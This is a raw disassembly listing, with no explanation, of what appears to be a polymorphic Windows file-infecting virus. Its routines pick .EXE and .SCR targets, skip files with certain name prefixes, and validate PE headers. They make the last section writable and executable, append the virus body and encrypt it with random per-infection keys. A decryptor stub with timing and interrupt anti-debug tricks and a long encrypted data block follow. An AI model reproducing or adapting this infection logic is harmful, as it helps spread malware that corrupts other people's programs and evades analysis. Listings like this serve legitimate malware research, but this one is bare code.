sub_31434B6C proc near ; CODE XREF: sub_31434C4B:loc_31434C9A�p
; sub_31434C4B+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_31434B71: ; CODE XREF: sub_31434B6C+23�j
jecxz short locret_31434BA8
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_31434BA8
cmp dword ptr [edx+0Ch], 1
jb short loc_31434B71
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_31434BA8: ; CODE XREF: sub_31434B6C:loc_31434B71�j
; sub_31434B6C+1D�j ...
retn
sub_31434B6C endp
; =============== S U B R O U T I N E =======================================
sub_31434BA9 proc near ; CODE XREF: UPX2:31434C35�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_31434BA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_31434BB6: ; CODE XREF: UPX2:31434BD7�j
mov ecx, edi
jmp short loc_31434BC5
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_31434BC1: ; CODE XREF: UPX2:31434BD3�j
mov ebx, edi
xor ecx, ecx
loc_31434BC5: ; CODE XREF: UPX2:31434BB8�j
; UPX2:31434BDB�j
lodsb
cmp al, 61h
jb short loc_31434BD0
cmp al, 7Ah
ja short loc_31434BD0
sub al, 20h
loc_31434BD0: ; CODE XREF: UPX2:31434BC8�j
; UPX2:31434BCC�j
stosb
cmp al, 5Ch
jz short loc_31434BC1
cmp al, 2Eh
jz short loc_31434BB6
cmp al, 0
jnz short loc_31434BC5
jecxz short locret_31434BA8
mov eax, [ecx]
cmp eax, 455845h
jz short loc_31434BF3
cmp eax, 524353h
jnz locret_31434B26
loc_31434BF3: ; CODE XREF: UPX2:31434BE6�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_31434B26
cmp eax, 4E554357h
jz locret_31434B26
cmp eax, 32334357h
jz locret_31434B26
cmp eax, 4F545350h
jz locret_31434B26
xor ebx, ebx
call sub_31434A55
jz locret_31434B26
xor edx, edx
call sub_31434C4B
call sub_31434BA9
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_31434F88
; =============== S U B R O U T I N E =======================================
sub_31434C4B proc near ; CODE XREF: UPX2:31434C30�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_31434F88
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_31434F88
test dword ptr [ebx+16h], 2000h
jnz loc_31434F88
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_31434F88
jecxz short loc_31434C9A
cmp ecx, 101h
jbe loc_31434F88
loc_31434C9A: ; CODE XREF: sub_31434C4B+41�j
call sub_31434B6C
jb loc_31434F88
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_314337A4
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_31434CC4: ; CODE XREF: sub_31434C4B+92�j
push 20h
dec cl
pop eax
js short loc_31434CDF
call sub_314337A4
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_31434CC4
; ---------------------------------------------------------------------------
loc_31434CDF: ; CODE XREF: sub_31434C4B+7E�j
; sub_31434C4B+CD�j ...
push 6
pop ecx
loc_31434CE5: ; CODE XREF: sub_31434C4B+B8�j
push 6
pop eax
call sub_314337A4
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_31434CE5
test dword ptr [ebp+403431h], 8
jnz short loc_31434D1A
cmp byte ptr [ebp+40342Bh], 1
jz short loc_31434CDF
loc_31434D1A: ; CODE XREF: sub_31434C4B+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31434D41
cmp byte ptr [ebp+403429h], 5
jz short loc_31434CDF
cmp byte ptr [ebp+40342Ah], 5
jz short loc_31434CDF
cmp byte ptr [ebp+40342Bh], 5
jz short loc_31434CDF
loc_31434D41: ; CODE XREF: sub_31434C4B+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31434D56
cmp byte ptr [ebp+403429h], 2
ja short loc_31434CDF
loc_31434D56: ; CODE XREF: sub_31434C4B+100�j
and dword ptr [ebp+4039AEh], 0
call loc_314341F1
call sub_31434B27
call sub_31434F91
mov ebx, [ebp+403976h]
call sub_31434A55
jz loc_31434F88
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_31434B6C
jb loc_31434F88
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31434DBE
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_31434DBE: ; CODE XREF: sub_31434C4B+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_31434DD2
rep movsb
loc_31434DD2: ; CODE XREF: sub_31434C4B+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_31434E8A
push dword ptr [ebx+28h]
call sub_31433F59
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_31434E8A
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_31434E0F
xor ecx, ecx
loc_31434E0F: ; CODE XREF: sub_31434C4B+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_31434E76
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_31434E4F
neg dword ptr [eax]
loc_31434E4F: ; CODE XREF: sub_31434C4B+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_31434E6D
neg dword ptr [eax]
loc_31434E6D: ; CODE XREF: sub_31434C4B+21E�j
push ecx
call sub_31434B27
pop ecx
jmp short loc_31434E82
; ---------------------------------------------------------------------------
loc_31434E76: ; CODE XREF: sub_31434C4B+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_31434E82: ; CODE XREF: sub_31434C4B+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_31434E8A: ; CODE XREF: sub_31434C4B+191�j
; sub_31434C4B+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_31434EA3
imul edx, 12345678h
loc_31434EA3: ; CODE XREF: sub_31434C4B+250�j
mov [eax-1], dl
call sub_31432E77
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_31434ED4
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_31434ED4: ; CODE XREF: sub_31434C4B+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_31434EF9
push edx
call sub_3143481F
pop edx
loc_31434EF9: ; CODE XREF: sub_31434C4B+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_31434F04
mov [ebx+28h], ecx
loc_31434F04: ; CODE XREF: sub_31434C4B+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_31434F15
mov [edx+8], ecx
loc_31434F15: ; CODE XREF: sub_31434C4B+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_31434F46
add ecx, [ebp+40106Dh]
loc_31434F46: ; CODE XREF: sub_31434C4B+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_31434F68
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_31434F68
mov dh, [ebp+403430h]
loc_31434F68: ; CODE XREF: sub_31434C4B+307�j
; sub_31434C4B+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_31434F7F
loc_31434F74: ; CODE XREF: sub_31434C4B+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_31434F74
jmp short loc_31434F88
; ---------------------------------------------------------------------------
loc_31434F7F: ; CODE XREF: sub_31434C4B+327�j
; sub_31434C4B+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_31434F7F
loc_31434F88: ; CODE XREF: UPX2:31434C46�j
; sub_31434C4B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_31434C4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31434F91 proc near ; CODE XREF: sub_31434C4B+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_31434B26
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_31434FAA: ; CODE XREF: sub_31434A55+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_31434FD2: ; CODE XREF: sub_31434A55+6B�j
; sub_31434A55+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_31434FDE: ; CODE XREF: sub_31434A55+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_31434F91 endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 403413h
call sub_31433613
popa
retn 4
; ---------------------------------------------------------------------------
dw 701h
dd 5060203h, 0E8CB86D9h, 15FF6167h, 1001074h, 90h, 3Fh dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 80ADA07Ch, 7Ch, 2 dup(0)
dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 81153C7Ch
dd 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch, 835DCA7Ch
dd 8111DA7Ch, 812ADE7Ch, 801D777Ch, 80B9057Ch, 80BB767Ch
dd 8309E17Ch, 863DE57Ch, 863F587Ch, 8127827Ch, 831CB87Ch
dd 8024427Ch, 810B1C7Ch, 80B9747Ch, 809A517Ch, 810D877Ch
dd 90D4607Ch, 90D6827Ch, 90D7547Ch, 90D7697Ch, 90D7937Ch
dd 90DC557Ch, 90DCFD7Ch, 90DD907Ch, 90DEB67Ch, 90EA327Ch
dd 9130C67Ch, 7Ch, 14h dup(0)
dd 380036h, 3143530Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 89000000h, 0Ch dup(0)
dd 0D9000000h, 2266h dup(0)
db 90h
; ---------------------------------------------------------------------------
call near ptr sub_3143E02D ; CODE XREF: sub_3143E02D+55�j
; =============== S U B R O U T I N E =======================================
sub_3143E006 proc near ; CODE XREF: sub_3143E02D+50�p
push ebx
mov ecx, 0CBFh
mov ebx, edx
loc_3143E00E: ; CODE XREF: sub_3143E006+13�j
xor [eax], dx
lea edx, [ebx+edx]
xchg dl, dh
lea eax, [eax+2]
loop loc_3143E00E
pop ebx
retn
sub_3143E006 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143E02D
loc_3143E01D: ; CODE XREF: sub_3143E02D+3B�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3143E02D
; ---------------------------------------------------------------------------
db 99h
db 81h
; =============== S U B R O U T I N E =======================================
sub_3143E021 proc near ; CODE XREF: sub_3143E02D:loc_3143E047�p
; sub_3143E02D+20�p
rdtsc
retn
sub_3143E021 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143E02D
loc_3143E024: ; CODE XREF: sub_3143E02D+8�j
; sub_3143E02D+12�j ...
mov eax, 1000h
xor ecx, ecx
jmp short loc_3143E052
; END OF FUNCTION CHUNK FOR sub_3143E02D
; =============== S U B R O U T I N E =======================================
sub_3143E02D proc far ; CODE XREF: UPX2:3143E001�p
; FUNCTION CHUNK AT 3143E01D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 3143E024 SIZE 00000009 BYTES
test eax, eax
jnz short loc_3143E039
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_3143E024
jmp short loc_3143E047
; ---------------------------------------------------------------------------
loc_3143E039: ; CODE XREF: sub_3143E02D+2�j
mov dx, cs
shl ebx, 0Ah
js short loc_3143E024
jnb short loc_3143E024
cmp dh, bh
jz short loc_3143E024
loc_3143E047: ; CODE XREF: sub_3143E02D+A�j
call sub_3143E021
xchg eax, ecx
call sub_3143E021
loc_3143E052: ; CODE XREF: sub_3143E02D-2�j
neg ecx
push ebp
add eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 0B406h
sub eax, 100h
jnb short loc_3143E01D
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-63h]
call sub_3143E006
jb short near ptr loc_3143E001+4
mov [esi-69h], ch
xchg eax, esp
lahf
scasd
int 47h
mov byte ptr [ecx-3290AC7Fh], 5Bh
cdq
sbb si, di
pop es
cwde
mov ch, 37h
retf 5B53h
sub_3143E02D endp
; ---------------------------------------------------------------------------
dw 711h
dd 2D75BF37h, 0FB92125Ah, 0F92839B8h, 55BE6D2Dh, 0C2ABD785h
dd 0B8B01345h, 1503FE3Ah, 4BCFFD8Bh, 2BE406Dh, 37D7FEA0h
dd 430D7EE2h, 756113B8h, 96E32F4Bh, 37F3CDECh, 0CBE16DDAh
dd 929E3D4Dh, 7565F524h, 7443DDC7h, 0C64FCAEEh, 0C6B11AE5h
dd 5AA80954h, 8590F3ECh, 0D2F43607h, 0DEA53147h, 0B88E1C78h
dd 0A205C52Ch, 8EA9488Dh, 250B9389h, 3F56D84Eh, 361DACC0h
dd 15C46FA8h, 0EACB4198h, 7C3E1311h, 0EFDADFA5h, 0C21D7477h
dd 7E0F8E66h, 0F3AEA7BCh, 7FBA3C68h, 63694B4Fh, 0A3FEF9FAh
dd 7D7691EAh, 3C332F00h, 0B4FA5C63h, 0B341E036h, 0EAFE4D44h
dd 109932EFh, 4834B2B6h, 2B324866h, 0DA6BE88Ah, 5EAF0E60h
dd 3A1593F0h, 97BA091Eh, 0A269DEEFh, 6BEE5D6Bh, 0F10E6F7Fh
dd 8F7CA176h, 192B8D2Dh, 592CD6AAh, 0C88BF2AEh, 78BF278Eh
dd 81EA9FF5h, 0BBF5CEEBh, 4C575D00h, 0E4C86279h, 5A91968Dh
dd 191DBEB2h, 52DD399Ah, 8C63D19Eh, 0E371E326h, 8299173Dh
dd 0F7A7758Fh, 0D00E4F5Fh, 0DBE7763Ah, 0C41405DCh, 8B749A5Fh
dd 4837B5D7h, 9DC72FA3h, 0D36DDB97h, 360C0918h, 1BA321F0h
dd 0B7BD8983h, 2D5C5619h, 0DDF6D1FDh, 0F8E60B5Fh, 9F269469h
dd 1C504206h, 0B9F929ADh, 409B7625h, 73F8EC69h, 1BF4EBCEh
dd 81DDDD8Dh, 474A9333h, 0F7ACF3B2h, 550AD397h, 1D31ACEBh
dd 23D9359Dh, 0D367D59Dh, 0AB072016h, 84659FE2h, 0CB203608h
dd 0D4D03A23h, 57EB6E3Eh, 0F3058431h, 19B56173h, 0A33B89A7h
dd 9BD2DB67h, 3071EFC3h, 75E45ADCh, 0FAA721F7h, 0A7298112h
dd 96DA307Ah, 0E0F57520h, 0E99A7163h, 7E2A9857h, 3044C39Dh
dd 60754B4Eh, 6193F9FBh, 969614E6h, 9AB02DABh, 56934976h
dd 2FEE093Dh, 0DBD4E4C7h, 0C5E87C6Dh, 0A0D0F04h, 354FCD91h
dd 5468653Fh, 6F83EBD6h, 0DEEE1EF1h, 0A5F67548h, 0EA85C6D8h
dd 6E636D72h, 0F63890F7h, 0ADAE6844h, 2A0E9638h, 0ACCADA1Ah
dd 5E74F001h, 5356B063h, 9BAA28CBh, 0AFC61A92h, 675BD631h
dd 1AF84766h, 859C9017h, 1A1E85ECh, 1D247A1Ah, 0B19BE285h
dd 0EF70FDCFh, 839A1AD0h, 0B475B68Eh, 0C9314D10h, 6E6DE83Ah
dd 6E02B17Fh, 393421CDh, 23C7498Ah, 26D4DEA4h, 0DC6EECBCh
dd 42A3B65Ch, 8CD4DDF4h, 817FB880h, 7E59571Ah, 0DEC25884h
dd 0F90C749Fh, 12DB2275h, 0A0C9C094h, 476DF11Bh, 1087EF2Bh
dd 0B2169EE2h, 16AE1CD7h, 82E189A4h, 0CD1D9E34h, 337B744Fh
dd 0EB17956Bh, 1D32B162h, 1C627613h, 9EE3E688h, 0B57501B9h
dd 49A6C11h, 0E2D234E8h, 0D785A827h, 55F4013Fh, 0C31312EFh
dd 0D3D2674h, 23B1BA8Eh, 0BEA82BE5h, 0D6D9963Dh, 768D46D9h
dd 3ACE26F8h, 7C6069Eh, 0A170BF1Ch, 690D97E2h, 9510E5B0h
dd 172BF7FDh, 312C0813h, 4B0B1B39h, 657CFAA4h, 0D1D77FEFh
dd 0CBBF5A50h, 9C72DFE2h, 52BD6408h, 6F973E97h, 8C1A9830h
dd 0AA35D95Ch, 5154A46Eh, 76983BCh, 0F3EE04BDh, 0E1A11FACh
dd 59D16B0Dh, 7C40AB78h, 83EF5E69h, 0F8F60D07h, 11259FFCh
dd 2B8A3092h, 0FC5AE8BCh, 5F75F467h, 0DF63E16Ah, 85ABC47Dh
dd 35484427h, 0CBEF4A34h, 737498B2h, 1248B56h, 6ABA52D0h
dd 0DD4AF8B6h, 4F65E3A0h, 2EF919Ch, 0F6CB699Eh, 0F3DC426Fh
dd 0ECAA2944h, 0B09C045Dh, 0F538216h, 3A3491E4h, 35BC3E8Bh
dd 6E54E28Fh, 324F87EBh, 0B61FF725h, 0BA513DFh, 96CA61D0h
dd 92DB32BDh, 0B527F910h, 0EBE5DE60h, 4728A67Bh, 4C2685F0h
dd 3A0EBBDAh, 0E1081A0h, 7DF17581h, 893AD2A9h, 38C97830h
dd 98B534F1h, 16AA2A00h, 34323FFEh, 0EF73285h, 39DB33C8h
dd 3869D793h, 928668D4h, 0B8B5247Ah, 0A291810Ah, 95445225h
dd 0FDE1E5A1h, 61F8D10Fh, 0E128AF4h, 8DBE4DBCh, 4268FDB4h
dd 0A324A5C3h, 47A4894Bh, 0E669A2F9h, 53400448h, 37332E2Bh
dd 89FF523Eh, 13BFA65h, 2806D7EAh, 46874099h, 0AD8A736Fh
dd 557DFBC9h, 0B17B8721h, 0B7AFB43Ah, 9FB94B2Eh, 0C22AA4B8h
dd 0B9507F54h, 574ACF3Eh, 0B4C9E7D8h, 3B61E593h, 21352A39h
dd 54F3FAD8h, 9627AFFAh, 4EBC0B26h, 3E29A844h, 0DD659010h
dd 1C0AB974h, 39E122E0h, 7C40BE93h, 6F5A4C53h, 0CA89F4F6h
dd 7AA125E0h, 6A56C615h, 0B0C645E8h, 0F8BA5F32h, 0B7AB2884h
dd 114FB39h, 0DFBBAE86h, 392199CDh, 8C34203Dh, 3DF79A86h
dd 7B7CF2EBh, 0A3BCAF9h, 0BAE05A6Dh, 85BB386Eh, 0DA0116A8h
dd 0CE9C9D41h, 0DBB17BABh, 3E0D8BFDh, 5870F03Ch, 738B1954h
dd 8EA624F4h, 0A9C03F10h, 0C4DA592Bh, 20A72517h, 0CA2480F4h
dd 0B8700C7Bh, 0D5310211h, 149C334Dh, 709998Bh, 18F872AAh
dd 0F2D2619Bh, 0C0BE2A7Fh, 0AD813069h, 9B972B24h, 6819E21Fh
dd 7D46C6F6h, 544FB9FEh, 3E189CCAh, 2E856DB1h, 0FCC17B9Dh
dd 0CFD37F6Fh, 0FDD41240h, 0AD8F0832h, 9861C13Eh, 7E42EC10h
dd 4F50D5FFh, 301AD7E8h, 390093A6h, 14E07F8Eh, 0D3D95B9Ch
dd 0C8B60014h, 9ABB294Eh, 97971A2Fh, 8C7AC500h, 1849CA1Ah
dd 532DB4DAh, 243784C7h, 21F99BFh, 0E4EB54E8h, 0C8D64662h
dd 0DFA12371h, 0E1970A5Ch, 8C6FD366h, 6874E91Eh, 5972B5FCh
dd 5306A4CBh, 310C8ECEh, 4ED41D7h, 0EECF48B4h, 0D4C9484Ch
dd 0B5A23441h, 0DCB00326h, 0B17FEF19h, 4243C811h, 2B24C5FBh
dd 328BFEBh, 0B1299AFh, 7AF77D88h, 0D8D94EBBh, 0DCB22278h
dd 0A7882657h, 8B9A3428h, 4616D50Dh, 747CDBE7h, 5020BFF8h
dd 2B0984FEh, 6AC365BDh, 0D6E97EABh, 0C5C3457Eh, 0C9B8144Fh
dd 0B99F0958h, 0F144FD2Ah, 5F54FB35h, 634BD4E9h, 7133B8CFh
dd 181482A1h, 0E94DDBh, 0FFCA40A2h, 0C2B52141h, 0A09C5A6Dh
dd 92902233h, 9560E711h, 614FEF7Ch, 5C37A6C0h, 0C0EB1D9h
dd 247BB8B2h, 11C06080h, 0FCDD5A6Ch, 0DBAC2752h, 0BB850E44h
dd 0AB901238h, 6A75D06Ch, 5E58D3E4h, 5A20A1CCh, 3205A4BAh
dd 0CEC4FB1h, 0F0D27F82h, 0C5F7394Ah, 0DABD0556h, 9C882236h
dd 0F56DEB35h, 6146D139h, 4C52D5D6h, 3329B6E7h, 1C139CADh
dd 1DFF42DFh, 0FCD87894h, 0DDB72676h, 0A6AC0D30h, 978B1228h
dd 9654A355h, 1959D8F2h, 5027B4CAh, 7E1092D1h, 1F1BB2FCh
dd 0E7CB179Dh, 0F4F55665h, 0EBCD2973h, 0BAA1125Fh, 9A40E539h
dd 6A75E81Bh, 5152C1FCh, 5901D0E2h, 3A04ADC9h, 18E756BDh
dd 0FEC6559Dh, 0D3D86F0Eh, 0A7BB3F6Fh, 0B89C1910h, 9D67D95Fh
dd 4726D41Ch, 5C20D2FDh, 3139B3FBh, 9319388h, 2D92758Eh
dd 0E3D95994h, 0DD862A79h, 0CC820F5Fh, 93920819h, 6E7FD20Ch
dd 687FAFE6h, 4326AEDCh, 223791C4h, 7EB76BBh, 0F5F87C88h
dd 0C4DC595Ch, 0C89F504Dh, 0B68E187Dh, 9B43E12Dh, 4220FB1Fh
dd 4349FAF9h, 1033A0C6h, 3F1280B3h, 3B8C79AFh, 0F5D56683h
dd 0FBA43473h, 0A3B8355Fh, 99B0073Bh, 0BF7BC063h, 624BCD0Fh
dd 532090F2h, 240FB7C5h, 290FB7CBh, 16C06487h, 0FCFF5864h
dd 0C1A92C4Fh, 0D08A0C5Eh, 9BB1091Ch, 6F5FF908h, 6E34D7EBh
dd 5F3F82D5h, 3B18B8D5h, 1CF666B5h, 0EFCB71A5h, 0D1F43962h
dd 0AEB12368h, 0AF8D0811h, 0F666E834h, 6273D539h, 495BC8FEh
dd 363081DFh, 321587B1h, 16E268ADh, 0DAAA5189h, 0CAB11262h
dd 0B38D2443h, 889D033Fh, 6F75FF2Eh, 6E4FC1F3h, 3427A8F2h
dd 3C3396FBh, 3E1A89A6h, 0F6EE6A83h, 0FBF95F64h, 0C0BC224Dh
dd 0B89C353Bh, 8C6BEF03h, 5A78FF1Fh, 4D51C4FEh, 7C3C85C3h
dd 4079FD0h, 1CE075ADh
dd 0DEF32293h, 0C9CA6E4Eh, 0B3AD2358h, 0B19E1245h, 967FEE13h
dd 6742CE19h, 432DA394h, 333EBEC0h, 151D91C8h, 8E07E8Bh
dd 0F6C0559Ch, 0C0C82274h, 0CD940251h, 8C921E3Ch, 6078E66Ah
dd 1D46D5EFh, 5239A5D7h, 250D88CAh, 1FEC6D90h, 0E9FF548Bh
dd 0A2DD5B6Dh, 0D8A63F6Dh, 0AC89054Dh, 0B072E01Dh, 684FF11Bh
dd 4359CEEDh, 3536A1FBh, 353BF0A7h, 18FF6EA9h, 0E1E7529Dh
dd 0AC832F76h, 0A2A83567h, 96931B3Bh, 9375FF2Bh, 5647DB2Bh
dd 45288D98h, 2E0FADD7h, 419A8B8h, 0ECFE5383h, 0DFF03067h
dd 0FF9B0B4Bh, 95CB560Bh, 0BEFF321Fh, 6B59FF0Bh, 6A50C0E7h
dd 6950B7C7h, 25248ED9h, 15CD6AB2h, 0CAD95A8Bh, 0C1DE680Dh
dd 0B3B02179h, 0B08E383Ah, 8F4CED2Bh, 7476A239h, 5F5AEEF5h
dd 3036B9FAh, 1E0DB6A3h, 7F798DE1h, 0FDFAE1D7h, 58C54417h
dd 0C8FB12BFh, 0E3937827h, 6B47C239h, 4BE32687h, 611A1C17h
dd 1D34A3DCh, 0A4150183h, 79B29C1h, 0A4A38C2h, 0BAFF64F4h
dd 16E1ACBFh, 59860F00h, 391EAC64h, 2453E774h, 0ABABDCCFh
dd 585FC7C6h, 0F785C85Fh, 8EA52365h, 0F73C5640h, 1052582Bh
dd 1378722Ch, 0FA65CC0Bh, 7E28B67Bh, 2E299397h, 48005FC7h
dd 33799DC9h, 0E86B42B7h, 989F0742h, 26361145h, 0CED34834h
dd 0B58983D5h, 11981BE0h, 12D0B1B5h, 284E5912h, 836AE789h
dd 0BF7B5183h, 0A2329864h, 2C34383Ah, 0BED34B49h, 261238A8h
dd 35820DA4h, 8322905Fh, 28240200h, 0BD1B3EA9h, 0D9F80E3Ch
dd 77BE266Fh, 8B69A874h, 9F2B4214h, 4322A3D0h, 0D3DDC3CFh
dd 8AD11565h, 0D5A32774h, 0DA47C580h, 0B39D1FAEh, 0A5223C46h
dd 8198FEBDh, 1DEF3103h, 87D639F3h, 5F2F5639h, 0DD20B3D1h
dd 564FC86Eh, 7067E4D9h, 11645A5Dh, 51EBEA8Ch, 7112FAF3h
dd 0D6A210D8h, 0F3BC3FCFh, 0C1D655C0h, 31713243h, 0F73A93FFh
dd 84A85C12h, 2B70A4FEh, 65968BFCh, 5F5CF4E2h, 1C9DCB62h
dd 8F1EAF3Bh, 900B4527h, 0D154DAF5h, 0E6DE797Dh, 0C2489342h
dd 1A5AAFE8h, 46B4FA63h, 0CA731BB2h, 1718B10h, 849C1AE0h
dd 9CEDE58Dh, 0F5D7371h, 0D5DA73ECh, 0F10839DCh, 80949D71h
dd 243AB983h, 0F57E2BA6h, 0ABBB65DFh, 76FF687Ch, 6553C6B2h
dd 0A607BCD2h, 970ED27Ch, 8BA4BFCDh, 0A85FCD0Bh, 81D65811h
dd 2E74E858h, 0C353192Ch, 5250C55Ch, 0FE4238E4h, 9F772915h
dd 0B3224970h, 0DE734BCh, 0C2D9E839h, 801C975Bh, 0DE07BA8Dh
dd 0B1557DDDh, 6241CF2Ch, 0E067F4D4h, 760A7FADh, 605B4CC3h
dd 0BED4BB70h, 58B36D40h, 0C413E5B6h, 25BE2A75h, 0AB3E8CA4h
dd 4251F3D5h, 5CCD76CCh, 9B0E0DDEh, 92AA2AF1h, 0ACC02B40h
dd 5D215D2Fh, 0E3C85D17h, 7A9F6DEEh, 182CAF5Bh, 32229699h
dd 4C63E55Bh, 322CAACDh, 146640E8h, 9C83185Ah, 2040852Dh
dd 0D2E7673Dh, 0EF6BD105h, 6F1DF03Fh, 6137B588h, 1EC72FF0h
dd 0C36DDB96h, 2BFCF052h, 8FCB75A2h, 0F1BD3C0Ch, 0E1F3E2D7h
dd 23F17041h, 0C72083CBh, 0D1A3FD78h, 3FA2A9E6h, 2F8851FCh
dd 826A7C6h, 0DF07EFB7h, 0CCAD1BD6h, 60B28692h, 0CA749F64h
dd 6BFB4A67h, 5644D03Fh, 9669EBE8h, 354DCE0Bh, 8F544EB6h
dd 99DB10BBh, 0D5CD4B47h, 0F0E76657h, 9644AF70h, 57EB5A17h
dd 0F1078C9Ch, 2F546172h, 0DCAE4684h, 6C56E48Ch, 73887A3Fh
